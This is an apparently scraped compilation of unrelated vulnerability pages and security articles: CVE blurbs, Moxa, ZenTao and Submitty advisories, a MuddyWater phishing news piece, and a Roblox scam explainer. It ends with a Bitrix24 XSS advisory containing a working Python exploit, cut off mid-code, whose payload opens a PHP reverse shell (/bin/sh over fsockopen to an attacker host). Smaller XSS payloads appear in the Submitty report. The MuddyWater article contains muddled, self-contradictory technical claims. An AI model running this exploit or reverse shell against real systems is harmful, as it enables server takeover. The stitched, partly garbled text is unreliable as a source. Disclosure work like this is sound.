An information leak in Hattoriya v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

Your browser does not support JavaScript! Please try to use a different browser to access this page.

CVE-2023-39053: 服部屋

An information leak in shouzu sweets oz v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

CVE-2023-39047: shouzu sweets oz

By Deeba Ahmed
MuddyWater (aka Mango Sandstorm and Static Kitten) is a cyberespionage group that's believed to be active since 2017.
This is a post from HackRead.com Read the original post: Iran’s MuddyWater Group Targets Israelis with Fake Memo Spear-Phishing

MuddyWater is using a fake memo from the Israeli Civil Service Commission as a lure to trick victims into downloading a RAT.

Iranian state-sponsored threat group MuddyWater is targeting Israeli entities in a spear-phishing campaign, reports cybersecurity firm Deep Instinct.

According to Deep Instinct’s treat intelligence researcher, Simon Kenin, MuddyWater is using a fake memo from the Israeli Civil Service Commission as a lure to trick victims into downloading a remote administration tool called Advanced Monitoring Agent (AMA).

This malware lets hackers remotely access their victims’ computers to steal data, disrupt their systems, and perform spying. The threat actor is targeting two Israeli entities to deploy the AMA, a legitimate remote administration tool from N-able.

The fake memo used by MuddyWater hackers (Credit: Deep Instinct)

In their blog post, researchers noted updated TTPs (techniques, tactics, and procedures) in this campaign compared to the group’s previous activities. For instance, the group has used similar attack chains in the past and focused on distributing remote access tools like ScreenConnect, Syncro, RemoteUtilities, SimplyHelp, etc.

However, in this spear-phishing campaign, MuddyWater has used a new technique called ‘eN-Able,’ which is a new type of phishing email designed to evade standard email security filters because the emails combine HTML and JavaScript and appear legitimate. These emails contain malicious code to exploit vulnerabilities in operating systems and email clients.

Another new tactic is called ‘spray and pray.’ This technique is akin to a phishing attack in which a large number of phishing emails are sent to a large number of targets. However, through the spray and pray technique, the chances of success increase dramatically, even if a fraction of the targets fall for the lure.

Furthermore, the group has used a new file-sharing service called Storyblok to launch the multi-stage infection vector containing hidden files, an LNK file that initiates the infection, and an executable to launch the malware. After the victim is compromised, the attacker connects to the infected host using the legit remote administration tool and starts reconnaissance.

In addition to these new TTPs, Deep Instinct notices that the group is leveraging a new C2 framework called Muddy2Go. Using new TTPs indicates that MuddyWater is trying to improve its modus operandi. These findings have been confirmed separately by another cybersecurity firm, Group-IB.

Campaign overview (Credit: Deep Instinct)

MuddyWater (aka Mango Sandstorm and Static Kitten) is a cyberespionage group that’s believed to be active since 2017. It represents a unit of Iran’s Ministry of Intelligence and Security (MOIS), like other groups, including Agrius, OilRig, and Scarred Manticore.

It is worth noting that this campaign is the latest in a series of targeted cyberattacks against Israeli entities by MuddyWater. In fact, since the escalation of tension between Israel and Palestine, many state-sponsored actors have become active in targeting Israel.

Recently, Hackread reported that Hamas hackers have developed a dangerous new malware dubbed BiBi-Linux to target Israeli systems. This malware can overwrite critical system files, making it impossible to boot up infected systems. The malware was distributed via spear-phishing emails designed to be from legitimate Israeli organizations.

Another spyware campaign was detected in October 2023 in which pro-Palestine hackers delivered malware to unsuspecting Israeli citizens using the rocket alert app.

1.  Israel’s Channel 10 TV Station Hacked by Hamas
2.  Hamas hacked the smartphones of over 100 IDF soldiers
3.  Hamas posed as women to con IDF into downloading malware
4.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
5.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
6.  Hamas hacked phones of IDF soldiers with seductive phones of women

Iran’s MuddyWater Group Targets Israelis with Fake Memo Spear-Phishing

Reportico 7.1.21 is vulnerable to Cross Site Scripting (XSS).

Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code, (typically HTML or JavaScript), into the contents of an outside website. When a victim views an infected page on the website, the injected code executes in the victim’s browser. Consequently, the attacker has bypassed the browser’s same origin policy and is able to steal private information from a victim associated with the website.

Steps:

1.  Login into the Reportico-7.1 admin module
2.  Under create report in project, enter the XSS payload in title section.
3.  The payload will execute once it's saved.

CVE-2023-46925: Reflected XSS in Reportico-7.1 · Issue #47 · reportico-web/reportico

A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.



As of June 15, 2022, this site no longer supports Internet Explorer. Please use another browser for the best experience on our site.

**Please sign in**

**SUMMARY**

**PT-G503 Series Multiple Vulnerabilities**

*   Security Advisory ID: MPSA-230203
*   Version: V1.0
*   Release Date: Nov 02, 2023
*   Reference:
    

PT-G503 Series firmware version v5.2 and prior are affected by multiple vulnerabilities in the old version of jQuery, weak cipher suites, and unsecure web cookies. Using the older jQuery version and weak cipher suites and not setting session cookie attributes properly caused these vulnerabilities. These vulnerabilities could put your security at risk in many ways, such as Cross-site Scripting (XSS) attacks, prototype pollution, data leaks, unauthorized access to user sessions, etc. 

  
The identified vulnerability types and potential impacts are shown below:

Item

Vulnerability Type

Impact

1

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79) 

CVE-2015-9251, CVE-2020-11022, CVE-2020-11023 (jQuery) 

An attacker located remotely can insert HTML or JavaScript into the system via a web interface. 

2

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') (CWE-1321) 

CVE-2019-11358 (jQuery) 

An attacker can inject attributes that are used in other components. 

3

Inadequate Encryption Strength (CWE-326) 

CVE-2005-4900 (cipher) 

An attacker may be able to decrypt the data using spoofing attacks. 

4

Sensitive Cookie Without 'HttpOnly' Flag (CWE-1004) 

CVE-2023-4217 (Cookie) 

This vulnerability could cause security risks and allow unauthorized access to user session data. 

5

Sensitive Cookie in HTTPS Session Without 'Secure' Attribute (CWE-614) 

CVE-2023-5035 (Cookie) 

This vulnerability could cause the cookie to be transmitted in plaintext over an HTTP session. 

**Vulnerability Scoring Details**

ID

CVSS V3.1

VECTOR

REMOTE EXPLOIT WITHOUT AUTH?

CVE-2005-4900 

5.9 

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 

Yes

CVE-2015-9251 

6.1 

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 

Yes

CVE-2019-11358 

6.1 

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 

Yes

CVE-2020-11022 

6.9 

AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N 

Yes

CVE-2020-11023 

6.9 

AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N 

Yes

CVE-2023-4217 

3.1 

AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 

Yes

CVE-2023-5035 

3.1 

AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N 

Yes

**AFFECTED PRODUCTS AND SOLUTIONS**

**Affected Products:**

The affected products and firmware versions are shown below.

Product Series

Affected Versions

PT-G503 Series 

Firmware version 5.2 and prior. 

**Solutions:**

For CVE-2005-4900, CVE-2015-9251, CVE-2019-11358, CVE-2020-11022, and CVE-2020-11023, Moxa has developed appropriate solutions to address the vulnerabilities by updating the jQuery version and removing weak cipher suites. The solutions for affected products are shown below. 

****Mitigation****

The risk levels of CVE-2023-4217 and CVE-2023-5035 are low, and it’s hard to forbidden HTTP connections because HTTP is still required in certain legacy application scenarios. To mitigate these vulnerabilities, users should carefully use HTTP if necessary, and could try to replace HTTP by HTTPS when using the web service. Additionally, refer to the following mitigation measures to deploy the product in an appropriate product security context. 

Moxa recommends users follow CISA recommendations.  

*   Reduce network exposure by ensuring that all control system devices and systems are not accessible from the Internet. 
    
*   Place control system networks and remote devices behind firewalls, isolating them from business networks. 
    
*   When remote access is necessary, employ secure methods such as Virtual Private Networks (VPNs). It is important to note that VPNs may have vulnerabilities and should be kept up to date with the latest available version. Remember that the security of a VPN depends on the security of its connected devices. 
    

**Revision History:**

VERSION

DESCRIPTION

RELEASE DATE

1.0

First Release

Nov 2, 2023 

**Relevant Products**

PT-G503 Series ·

*     Print this page
    
*   You can manage and share your saved list in My Moxa
    

**Let’s get that fixed**

If you are concerned about a potential cybersecurity vulnerability, please contact us and one of technical support staff will get in touch with you.

Report a Vulnerability

CVE-2023-5035: PT-G503 Series Multiple Vulnerabilities

A Stored Cross-Site Scripting vulnerability was discovered in ZenTao 18.3 where a user can create a project, and in the name field of the project, they can inject malicious JavaScript code.

English | 中文

    

**Introduction**

ZenTao is the first opensource project management software in China. It’s a comprehensive, all-in-one platform that covers the main PM process, from product and project management to quality management, documentation management, organization management, and office management.

Since its establishment in 2009, ZenTao has helped tens of thousands of teams and organizations improve their project management structures. Currently, ZenTao is being used by some of the largest companies in the world, ranging from those in the sectors of finance and telecoms to manufacturing and software development. They trust ZenTao for streamlining their processes, simplifying communication between clients and employees, increasing transparency, and improving productivity and efficiency.

**Design Philosophy**

The name ZenTao came from combining two Chinese characters, Zen(禅) and Tao(道), which have rich inspirations pertaining to culture and history. With its name referring to highly respected aspects of life, it’s only logical to convey their meaning in management by providing transparency, orderliness, and accessibility.

ZenTao management concept is built on the 3 popular management methodologies: Scrum, Waterfall, and Kanban:

*   The Scrum model built-in ZenTao is adaptable and flexible, which perfectly matches the rapid iterations of software development projects.
*   The Waterfall model built-in ZenTao lays emphasis on stages division and strict process control, which is ideal for projects that are well defined in advance and with fewer changes.
*   The Kanban model built-in ZenTao pays more attention to value flow and visualization, which is suitable for the team with a transparent process and efficient transmission of information.

ZenTao clearly defines the concepts of product, project, and QA to help the product owners, developers, and testers coordinate with each other while maintaining separate functionalities. Through stories, tasks, and bugs, the whole teams interact and track issues and improvements to ensure the delivery of quality products.

Besides, with ZenTao's feature-rich modules including data visualization, measurement, DevOps, Doc asset management, and automated testing, ZenTao offers flexible solutions to cover the entire process of software development, allows organizations to work efficiently and productivity, and helps them better control time, cost, and quality.

**Official Website**

*   Website
*   Manual
*   FAQ
*   Extension

**Demo**

*   ZenTao Opensource
*   ZenTao Biz
*   ZenTao Max

**Security Vulnerabilities**

If you find any vulnerability in ZenTao system please feel free to contact us at chunsheng@easycorp.ltd. We do appreciate your time and effort.

**License**

ZenTao is an opensource project management software licensed on AGPL and ZPL.

**Enhanced version**

ZenTao Biz, ZenTao Max, and ZenTao Cloud are available for you if ZenTao Opensource can not meet your feature requirement.

> Learn more about the comparison between ZenTao Opensource, ZenTao Biz, and ZenTao Max.

**ZenTao Biz**

ZenTao Biz has more powerful functions based on the ZenTao Open Source. It also expands horizontally based on the project management process and covers more roles.

On the one hand, ZenTao Biz provides more complete services for enterprises and its enhanced functions are more suitable for the internal process management of the companies.

On the other hand, ZenTao Biz has more added functions such as operation and maintenance management, OA office management, feedback management, as well as document version management, and online preview. It can support the customer's related work more effectively outside the development process, and provide more comprehensive support for the project management process.

**ZenTao Max**

ZenTao Max, the most advanced ZenTao version, allows users to easily monitor and track the entire process of project management. It also helps improve the robustness and maturity of enterprises to greatly increase the probability of project success.

The features such as process control, process definition, project measurement, issue management, risk management, quality assurance, and project reporting are strong enhanced in ZenTao Max. It's also supported the implementation of CMMI standards, help enterprises pass CMMI assessment.

**ZenTao Cloud**

> Learn more about ZenTao Cloud.

ZenTao Cloud provides a flexible solution for users who prefer the SaaS service and running businesses anywhere and anytime. It's easy to use and super convenient in that it only needs one click to activate an account. Besides, ZenTao Cloud requires no maintenance and will keep updating automatically. With HTTPS agreement, your data will keep safe and no worry about information disclosure. Even better, data on ZenTao Cloud will backup automatically and users can download the backup file at any time.

CVE-2023-46475: GitHub - easysoft/zentaopms: Zentao is an agile(scrum) project management system/tool, Free Upgrade Forever!​

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-46475: CVE-Disclosures/ZentaoPMS/CVE-2023-46475/CVE-2023-46475 - Cross-Site Scripting (Stored).md at main · elementalSec/CVE-Disclosures

Submitty before v22.06.00 is vulnerable to Cross Site Scripting (XSS). An attacker can create a malicious link in the forum that leads to XSS.

**Introduction**

Submitty before v22.06.00 is vulnerable to Cross Site Scripting (XSS). An attacker can create a malicious link in the forum that leads to XSS.

**CVSS Score****Score**

*   **CVSS v3.1:** 6.5
*   **Vector:** AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

**Impact**

*   **Confidentiality:** The attacker can read any data within the victim's context.
*   **Integrity:** The attacker can utilize the victim's privilege to perform actions as that user.
*   **Availability:** If the victim is an administrator, the attcker can prevent the service from running.

**Likelihood**

*   **Skill Required:** This attack requires basic knowledge of XSS and Markdown.
*   **Conditions:** The attcker must be able to send a malicious link to the forum, and the victim must click the link to trigger the attack.
*   **Discoverability:** This vulnerability is easy to find.

**Problem Details****Overview**

This report identifies a Cross-Site Scripting (XSS) vulnerability within Submitty, specifically within the Markdown rendering functionality of the forum component. The vulnerability arises due to inadequate sanitization of user input in Markdown links. An attacker can exploit this flaw by crafting a malicious Markdown link that contains embedded JavaScript code.

Markdown, being a lightweight markup language, is widely used for formatting text on the web. Submitty uses Markdown for various user-generated content areas. However, the current implementation does not properly escape JavaScript URLs (javascript:) within the links. As a result, when a Markdown link containing JavaScript is rendered, the script gets executed instead of being treated as a regular hyperlink.

This type of XSS vulnerability is particularly concerning because:

*   It allows an attacker to execute arbitrary JavaScript code in the context of the user's browser session.
*   It can lead to a range of malicious activities, including session hijacking, personal data theft, and delivery of malware.
*   It affects all users viewing the rendered Markdown content, making it a significant threat to the user base.

**Affected Area**

The forum component of Submitty.

**Root Cause**

The vulnerability originates from the use of the CommonMarkConverter library in the application for rendering Markdown content. While CommonMarkConverter is a robust and popular choice for converting Markdown to HTML, its security relies heavily on proper configuration.

The primary cause of this XSS vulnerability is a misconfiguration in the CommonMarkConverter usage. Specifically, the allow_unsafe_links option was not explicitly set to false. This configuration flag controls whether the parser permits javascript: URLs, which are inherently dangerous as they can be used to execute JavaScript code directly in the browser. By default, CommonMarkConverter is designed to allow all links, including javascript: URLs, considering some use cases might require such functionality. However, this default behavior poses a significant security risk in environments where user-generated content is parsed and rendered.

**Steps to Reproduce**

Following steps are required to reproduce the issue.

1.  Access to the forum component of Submitty (any version before v22.06.00).
2.  Create a new post, use Markdown and put [XSS](javascript:alert('XSS')) as payload.
3.  Submit the new post.
4.  Click the link XSS, then notice that the script javascript:alert('XSS') has been executed.

When using the CommonMarkConverter library, the allow_unsafe_links option should be explicitly set to false.

**References**

The vulnerability has been fixed as a part of pull request 8032.

_Report prepared by: Fu Chai_ _Date: 10/31/2023_

CVE-2023-43193: CVE-2023-43193: Submitty Cross-Site Scripting (XSS) Vulnerability Report

Knowing the common scams is an important step in using the platform safely. The following recommendations help players not fall into scams.

Thursday, November 2, 2023 07:11

*   Online video games often make use of in-game virtual currency and give players the ability to purchase, trade or sell items. While these features are often selling points for players and potential revenue streams for the companies that make them, they also inevitably draw bad actors and scams.
*   One of these games is “Roblox,” a highly popular gaming platform, especially among children. We curated a short list of scams that have been reported online, such as on user support forums, YouTube videos and scammer Discord channels, explaining how they work and providing advice on how to detect and avoid them.

Roblox is a gaming platform composed of “Experiences,” which is “Roblox’s” name for user-created 3-D worlds where players can interact with each other and their surroundings. The creator, which can be any user, builds the scenarios, the game logic, items and overall interactivity of the experience.

Roblox is free to play but contains an in-application currency called “Robux” that can be used to purchase clothes, weapons or other items for a user’s avatar, some of which exist in limited quantities and can be worth tens of thousands of real-world dollars. Items can also be traded for other items or Robux using a built-in trading system. This creates a potentially profitable market and even though trading for real money is prohibited by the terms of service, some users negotiate outside the platform and trade using real money.

Where there is a potential for profit there are also people trying to scam others. “Roblox” users can be targeted by scammers (known as “beamers” by “Roblox” players) who attempt to steal valuable items or Robux from other players. This can sometimes be made easier for the scammers because of “Roblox's” young user base. Nearly half of the game’s 65 million users are under the age of 13 who may not be as adept at spotting scams.

**How to identify scams**

Having knowledge of common scams and how they work is key to spotting them, even if you’ve never heard of a particular tactic before. The following are some of the most common scams that have been seen targetting “Roblox” users.

**Offering free Robux/phishing** 

The scammer sends a message using “Roblox’s” in-game chat or another messaging application, to the victim offering a way to earn free Robux. In the most common variation of this scam, the user receives a link to a web page containing “Roblox”-related themes or images. The site offers the victim free Robux and asks the victim to enter their username and password so that they can receive the Robux in their account. After inserting their username and password, instead of receiving the Robux, the scammer logs into the victim’s account and steals all Robux and valuable items.

**In-experience phishing** 

In Roblox, any user can create experiences, including scammers. In this case, the scammer creates a malicious experience that promises to deliver free Robux and prompts the victim to fill out a form with their username and password. The victim’s credentials are sent to an actor-controlled server, allowing the adversary to log in to the user’s account and steal all Robux and valuable items.

__source: https://roblox.fandom.com/wiki/Scam/Gallery?file=Reward\_scam.jpg__

**JavaScript method** 

The scammer asks the victims to copy and paste a link containing JavaScript code into the browser’s address bar. There are many variations that use this method. In one common variation, the scammer pretends to be developing an experience and asks the user to use their avatar image in the experience. To receive the details of the avatar automatically, the scammer asks the victim to copy and paste the link containing the JavaScript code into the browser’s address bar. That code then steals the victim’s session ID, allowing the scammer to use the platform to log in to the victim's account and transfer all items and Robux from the victim's account to the scammer’s account. 

**Bookmark method** 

The bookmark method is a variant of the JavaScript method. Instead of asking the victim to paste a link into the address bar, the victim is asked to drag and drop the bookmark into the bookmarks bar and then click on it. The bookmark contains JavaScript code that steals the victim’s session ID. 

source: https://www.reddit.com/r/robloxhackers/comments/11eofbr/possibly\_new\_roblox\_scam/

**API method** 

The scammer proposes a trade that is usually too good to be true to the victim. Then, the attacker says that before continuing with the trade, they would like to check if the victim’s items have not been stolen. To do this, they say, the victim must visit a special page in Roblox and insert an ID. They then give the victim the URL for a page that is actually part of the Roblox domain and contains the following form, among other things.

This page is part of the Roblox API documentation and is used by developers to test the API. While talking with the victim, the scammer creates a trade request that, if accepted, would transfer all the victim’s items to the scammer. The scammer then sends this ID to the victim and instructs him to insert the ID in the form and click “Try it out.” This will cause the user to accept a trade with the specified ID and transfer all their items and Robux to the scammer.

**HAR file method** 

The scammer offers to create a free GFX (a 3-D, realistic version of the victim’s avatar) under the pretext that they are learning to do this and could use the practice. If the victim accepts, the scammer says they need a file to complete the development and gives the victim a tutorial or video explaining how to obtain the file. The tutorial requests that the victim open their browser developer tools and save the network request as a HAR file, as shown below.

Once saved, the victim is instructed to send it to the scammer. This file contains the session ID of the victim, which allows the scammer to use the platform logged into the victim’s account and steal all items and Robux.

**Double trade** 

The scammer approaches the victim proposing two trades. One trade is good for the scammer and one is good for the victim. The victim comes out with a clear advantage from this trade. The scammer puts the condition that the victim either accepts both trades or rejects both trades. However, while they chat, the scammer removes some Robux from their account, making the trade that favors the victim fail for lack of Robux in the attacker's account. When the victim accepts both trades, only the bad trade goes through, making it a bad deal for the victim.

**Malware installation** 

This method is as simple as requesting the victim to install some software or a browser extension as a way to receive free Robux or to help the scammer perform some development that is of interest to the victim. The installed software is malware, designed to steal the victim’s session ID, which allows the scammer to use the platform logged in to the victim’s account and steal all items and Robux.

**5 ways to avoid being scammed**

Knowing the common scams is an important step in using the platform safely. The following recommendations help players not fall into scams:

*   **If it seems too good to be true, it is:** This is probably the most important recommendation. If a stranger or a website is claiming to offer free currency or free items, it is almost certainly a scam.
*   **Don't open links or download files sent by unknown sources:** These links can be phishing or malware delivery lures. If you don't know the other player, it’s generally a good idea to not open the link.
*   **Be suspicious of requests to perform unusual actions**: Some scams rely on the user performing more or less technical actions. These are a good indicator that it may be a scam. For example:
    *   Copy-pasting into the browser address bar.
    *   Creating and clicking in bookmarks.
    *   Opening browser developer tools.
*   **Be suspicious of unusual trades**: When trading some attention to some red flags, such as:
    *   Trades that are conducted outside the platform.
    *   Trades where the trader creates unusual rules such as double trades.
    *   Requests to perform actions on the web browser during a trade negotiation, such as using the API form.
*   **Use the platform’s built-in security features**: Roblox takes security seriously and provides security guides and several features to increase security. For example:
    *   Enable multi-factor authentication.
    *   Configure account privacy.
    *   Configure who, if anyone, can trade with the player.
    *   Configure the trade quality filter to help avoid suspicious trades.
    *   Enable a mandatory PIN to change settings.
    *   Exploring and using these can help better protect minors. The following links contain additional information and guidance:

https://corporate.roblox.com/parents/ 

https://en.help.roblox.com/hc/en-us/articles/203313380-Keep-Your-Account-Safe

Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”


A logic error when using mb_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload.







**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

Critical

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1715 & CVE-2023-1716

**CVE Description**

_(CVE-2023-1715)_: A logic error when using mb\_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload. _(CVE-2023-1716)_: Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.

**CWE Classification(s)**

CWE-83 Improper Neutralization of Script in Attributes in a Web Page

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.0 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability in Bitrix24’s Invoice Edit page that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Authorized users may edit an invoice they have access to via the crm.invoice.edit component, located at bitrix/components/bitrix/crm.invoice.edit/component.php and accessible via a post request to https://TARGET_HOST/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=/crm/invoice/edit/INVOICE_ID/.

One of the fields that can be supplied by an attacker is the USER_DESCRIPTION field. As this field is rendered as HTML by a rich text editor in the frontend, sanitization is performed on this field to prevent XSS:

    // bitrix/components/bitrix/crm.invoice.edit/component.php lines 746 to 763
    
    $userDescription = trim($_POST['USER_DESCRIPTION']);
    $bSanitizeUserDescription = ($userDescription !== '' && mb_strpos($userDescription, '<')); // [1]
    if($bSanitizeComments || $bSanitizeUserDescription)
    {
        $sanitizer = new CBXSanitizer();
        $sanitizer->ApplyDoubleEncode(false);
        $sanitizer->SetLevel(CBXSanitizer::SECURE_LEVEL_MIDDLE);
        //Crutch for for Chrome line break behaviour in HTML editor.
        $sanitizer->AddTags(array('div' => array()));
        $sanitizer->AddTags(array('a' => array('href', 'title', 'name', 'style', 'alt', 'target')));
        $sanitizer->AddTags(array('p' => array()));
        $sanitizer->AddTags(array('span' => array('style')));
        if ($bSanitizeComments)
            $comments = $sanitizer->SanitizeHtml($comments);
        if ($bSanitizeUserDescription)
            $userDescription = $sanitizer->SanitizeHtml($userDescription);
        unset($sanitizer);
    }
    

The mb_strpos($userDescription, '<') check ([1]) is supposed to check if the user description contains the < character, which could indicate that this field contains HTML tags and thus requires sanitization. However, if the < character is the first character, mb_strpos($userDescription, '<') would be 0, resulting in $bSanitizeUserDescription being false. Thus, sanitization of this field can be completely bypassed.

The $userDescription field is subsequently saved to the database, along with the rest of the invoice data.

However, the built-in Bitrix XSS sanitizer, applied to the body parameters of every request, complicates exploitation of this vulnerability.

The XSS sanitizer uses several regular expressions (regex) to identify and sanitize potentially dangerous input. One of these aims to target HTML event handlers, which could lead to XSS. The regex used can be found in bitrix/modules/security/lib/filter/auditor/xss.php on line 173, and a simplified version is shown below:

    /(on[a-z]*)([a-z]{3}[\s]*=)/is
    

The regex aims to identify patterns such as onerror= and uses two capturing groups to split the dangerous string into two parts. A space is then added between the two parts, neutralizing the event handler. For example, onerror= would be transformed into oner ror=. Note that the regex allows any amount of whitespace between the event handler name (eg onerror) and the equals sign (=). This is compliant with the HTML specification. On its own, this sanitizer is secure.

When an authorized user navigates to the invoice edit page, the stored invoice is retrieved. The user description field is then passed to the CLightHTMLEditor class as the content to be edited.

The configuration for this editor, including the content, is injected into the JavaScript context after sanitization by the CUtil::PhpToJSObject function.

    <script>
    // ...
    // bitrix/modules/fileman/classes/general/light_editor.php line 254
    top.<?=$this->jsObjName?> = window.<?=$this->jsObjName?> = new window.JCLightHTMLEditor(<?=CUtil::PhpToJSObject($this->JSConfig)?>);
    // ...
    </script>
    

The CUtil::PhpToJSObject function calls the CUtil::JSEscape function (shown below) on the value of each key-value pair in the $this->JSConfig array.

    // bitrix/modules/main/tools.php lines 4349 to 4355
    
    public static function JSEscape($s){
        static $aSearch = array("\xe2\x80\xa9", "\\", "'", "\"", "\r\n", "\r", "\n", "\xe2\x80\xa8", "*/", "</");
        static $aReplace = array(" ", "\\\\", "\\'", '\\"', "\n", "\n", "\\n", "\\n", "*\\/", "<\\/");
        $val = str_replace($aSearch, $aReplace, $s);
        return $val;
    }
    

This function performs a simple string replacement on the input string $s to ensure that it does not contain any characters that may break out of a JavaScript string, such as ", ' or \.

Notably, this function replaces the byte string \xe2\x80\xa9 (U+2029 Unicode Paragraph Separator) with a regular space (U+0020 Space).

This is a significant transformation as the Bitrix XSS sanitizer does not regard the byte string \xe2\x80\xa9 as whitespace. Therefore, the string onerror\xe2\x80\xa9= would not be sanitized. However, CUtil::JSEscape would transform the string into onerror =, which is a valid HTML onerror event handler.

After sanitization and transformation by CUtil::JSEscape, the constructor of the JavaScript class JCLightHTMLEditor injects the content to be edited into HTML:

    // bitrix/js/fileman/light_editor/le_core.js lines 616 to 618
    
    this.pEditorDocument.open();
    this.pEditorDocument.write('<html><head></head><body>' + sContent + '</body></html>');
    this.pEditorDocument.close();
    

Therefore, a malicious attacker may create an invoice with user description <img src=x onerror\xe2\x80\xa9=alert(document.domain)>. As < is the first character in the string, sanitization in bitrix/components/bitrix/crm.invoice.edit/component.php is bypassed. Additionally, as onerror\xe2\x80\xa9= does not match the regex for an event handler, the built-in XSS sanitizer does not sanitize this string. Finally CUtil::JSEscape replaces \xe2\x80\xa9 with , resulting in <img src=x onerror =alert(document.domain)>. This string is then injected into HTML, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that edits an existing invoice to inject malicious HTML in the user description field.

A sample exploit script is shown below:

    # Bitrix24 Invoice Edit Page XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/crm/invoice/edit/XXXX
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import base64
    
    import requests
    import re
    import os
    import typing
    import subprocess
    import threading
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    USERNAME = "user"
    PASSWORD = "abcdef"
    
    TARGET_INVOICE_ID = 3
    
    LPORT = 9001
    LHOST = "192.168.86.43"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def nested_to_urlencoded(val: typing.Any, prefix="") -> dict:
        out = dict()
        if type(val) is dict:
            for k, v in val.items():
                child = nested_to_urlencoded(v, prefix=(k if prefix == "" else f"[{k}]"))
                for key, val in child.items():
                    out[prefix + key] = val
        elif type(val) in [list, tuple]:
            for i, item in enumerate(val):
                child = nested_to_urlencoded(item, prefix=f"[{i}]")
                for key, val in child.items():
                    out[prefix + key] = val
        else:
            out[prefix] = val
        return out
    
    
    def dict_to_str(d):
        return "&".join(f"{k}={v}" for k, v in d.items())
    
    
    def check_creds(cookie, sessid):
        return requests.get(HOST + "/bitrix/tools/public_session.php", headers={
            "X-Bitrix-Csrf-Token": sessid
        }, cookies={
            "PHPSESSID": cookie,
        }, proxies=PROXY).text == "OK"
    
    
    def login(session, username, password):
        if os.path.isfile("./cached-creds.txt"):
            cookie, sessid = open("./cached-creds.txt").read().split(":")
            if check_creds(cookie, sessid):
                session.cookies.set("PHPSESSID", cookie)
                print("[+] Using cached credentials")
                return sessid
            else:
                print("[!] Cached credentials are invalid")
        session.get(HOST + "/")
        resp = session.post(
            HOST + "/?login=yes",
            data={
                "AUTH_FORM": "Y",
                "TYPE": "AUTH",
                "backurl": "/",
                "USER_LOGIN": username,
                "USER_PASSWORD": password,
            },
        )
        if session.cookies.get("BITRIX_SM_LOGIN", "") == "":
            print(f"[!] Invalid credentials")
            exit()
        sessid = re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), resp.text).group(
            1
        )
        print(f"[+] Logged in as {username}")
        with open("./cached-creds.txt", "w") as f:
            f.write(f"{session.cookies.get('PHPSESSID')}:{sessid}")
        return sessid
    
    
    def edit_invoice(session: requests.Session, sessid):
        payload = base64.b64encode("""
        fetch("/bitrix/admin/php_command_line.php?lang=en&"+window.parent.document.body.innerHTML.match(/sessid=[a-f0-9]{32}/)[0],{
            method:"POST",
            headers:{
              'Content-Type': 'application/x-www-form-urlencoded'
            },    
            body: new URLSearchParams({
                query: `$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`,
                ajax: "y",
                result_as_text:"N"
            })
        })
        """.replace("LHOST", LHOST).replace("LPORT", str(LPORT)).encode())
        session.post(
